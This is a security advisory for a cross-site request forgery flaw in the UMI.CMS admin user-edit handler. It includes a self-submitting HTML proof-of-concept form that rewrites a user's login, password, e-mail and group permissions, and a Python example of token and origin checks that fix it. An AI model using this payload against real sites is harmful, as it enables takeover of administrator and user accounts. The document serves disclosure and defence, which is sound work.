HTB22812: XSRF (CSRF) in UMI.CMS



Vulnerability ID: HTB22812
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_umi_cms.html
Product: UMI.CMS
Vendor: umisoft ( http://www.umi-cms.ru/ )
Vulnerable Version: 2.8.1.2
Vendor Notification: 25 January 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists because the "/admin/users/edit/USERID/do/" script does not verify the source of the HTTP request: it processes a POST on the strength of the administrator's session cookie alone. The PoC below carries only the fields of the user-edit form and no request-specific secret (such as an anti-CSRF token), so a form hosted on any third-party site is accepted as if it had been submitted from the CMS's own edit page.

Successful exploitation requires a logged-in UMI.CMS administrator to open an attacker-controlled page; the victim's browser then sends the forged POST together with the administrator's session cookie and the CMS treats it as a legitimate save. With the request in the PoC below the attacker can change the targeted user's login, password, e-mail address, group membership and activation status, which amounts to a takeover of that account and, depending on the groups assigned, to a compromise of the application and disclosure or modification of sensitive data.

The attacker needs nothing more than a web page that the victim's browser renders while the administrator session is active; the form submits itself on load. The following PoC is available:

<!-- [host] is the target UMI.CMS site and USERID the numeric id of the account to modify.
     The victim must be logged in to the admin panel when this page loads. -->
<form action="http://[host]/admin/users/edit/USERID/do/" method="post" name="main" enctype="multipart/form-data">

<!-- "referer" is an application form field, not the HTTP Referer header -->
<input type="hidden" name="referer" value="google">
<input type="hidden" name="domain" value="[host]">
<input type="hidden" name="type-id" value="4">
<!-- new credentials and contact address for the targeted account -->
<input type="hidden" name="data[USERID][login]" value="test">
<input type="hidden" name="data[USERID][password][]" value="">
<input type="hidden" name="data[USERID][e-mail]" value="email@xxxxxxxxxxx">
<!-- group membership; the 0 entries mirror the hidden-input/checkbox pairs of the original form -->
<input type="hidden" name="data[USERID][groups][]" value="0">
<input type="hidden" name="data[USERID][groups][]" value="2374">
<input type="hidden" name="data[USERID][groups][]" value="0">
<input type="hidden" name="data[USERID][is_activated]" value="0">
<input type="hidden" name="data[USERID][is_activated]" value="1">
<input type="hidden" name="data[USERID][preffered_currency]" value="">
<input type="hidden" name="data[USERID][lname]" value="">
<input type="hidden" name="data[USERID][fname]" value="">
<input type="hidden" name="data[USERID][father_name]" value="">
<!-- module permissions granted to the account -->
<input type="hidden" name="ps_m_perms[content]" value="content">
<input type="hidden" name="domain[1]" value="0">
<input type="hidden" name="domain[1]" value="1">
<input type="hidden" name="content[content]" value="1">
<input type="hidden" name="content[sitetree]" value="1">
<input type="hidden" name="save-mode" value="Save">

</form>
<script>
/* submit automatically as soon as the page is rendered */
document.main.submit();
</script>
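What the vulnerable handler is missing is shown below as an added example; it is not UMI.CMS code and does not describe how the vendor fixed the issue. It models the check a "/admin/users/edit/USERID/do/" handler needs: a synchronizer token minted per session and rendered into the CMS's own edit form, which a cross-site form cannot know, plus an Origin/Referer check as a second layer. The deployment origin https://cms.example, the user id 12 and the attacker's e-mail address are assumed values; the form dictionary reproduces the field names of the PoC above with duplicate scalar keys collapsed to their last value.

```python
"""Server-side CSRF defence for a state-changing admin endpoint (added example)."""
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed deployment origin of the CMS (constructed for this example).
SITE_ORIGIN = "https://cms.example"

# The advisory's PoC body, reproduced as a parsed form (USERID = 12 is assumed).
# Note what is absent: there is no field the attacker could not have written
# in advance, so the session cookie alone decides whether the save happens.
ADVISORY_POC_FORM = {
    "referer": "google",                   # application field, not the HTTP header
    "domain": "cms.example",
    "type-id": "4",
    "data[12][login]": "test",
    "data[12][password][]": "",
    "data[12][e-mail]": "attacker@attacker.example",   # constructed value
    "data[12][groups][]": ["0", "2374", "0"],
    "data[12][is_activated]": "1",         # last of the duplicated 0/1 values
    "ps_m_perms[content]": "content",
    "domain[1]": "1",
    "content[content]": "1",
    "content[sitetree]": "1",
    "save-mode": "Save",
}


class Session:
    """Minimal server-side session.  The token is minted once per session and
    only ever appears inside pages served to that session's owner, so a page
    on another origin cannot read or guess it."""

    def __init__(self):
        self.csrf_token = secrets.token_urlsafe(32)


def csrf_token_input(session):
    """Hidden input the CMS would render into its own user-edit form."""
    return f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'


def request_origin(headers):
    """Origin header, falling back to scheme://host of the Referer; None if neither."""
    if "Origin" in headers:
        return headers["Origin"]          # "null" for sandboxed/opaque origins -> rejected later
    ref = headers.get("Referer")
    if not ref:
        return None
    p = urlsplit(ref)
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else None


def verify_state_changing_request(method, headers, form, session):
    """Return True only when a state-changing request is provably first-party.

    Both layers must pass: a same-origin Origin/Referer and a token equal
    (compared in constant time) to the one bound to the victim's session.
    A missing header or missing token is a failure, never a pass.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True                       # safe methods must not change state
    if request_origin(headers) != SITE_ORIGIN:
        return False
    submitted = form.get("csrf_token")
    if not isinstance(submitted, str):
        return False
    return hmac.compare_digest(submitted.encode(), session.csrf_token.encode())


if __name__ == "__main__":
    admin = Session()
    # The forged request exactly as the PoC produces it: cross-site, no token.
    print(verify_state_changing_request(
        "POST", {"Origin": "http://attacker.example"}, ADVISORY_POC_FORM, admin))
    # The same body submitted from the CMS's own form, token included.
    legit = dict(ADVISORY_POC_FORM, csrf_token=admin.csrf_token)
    print(verify_state_changing_request("POST", {"Origin": SITE_ORIGIN}, legit, admin))
```

The token check is the one that actually closes the hole; the origin check is cheap defence in depth for requests that arrive without any form body at all. Treat an absent Origin and Referer as cross-site rather than trusted, and reject the literal value "null", which browsers send for sandboxed frames and some privacy-preserving navigations.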


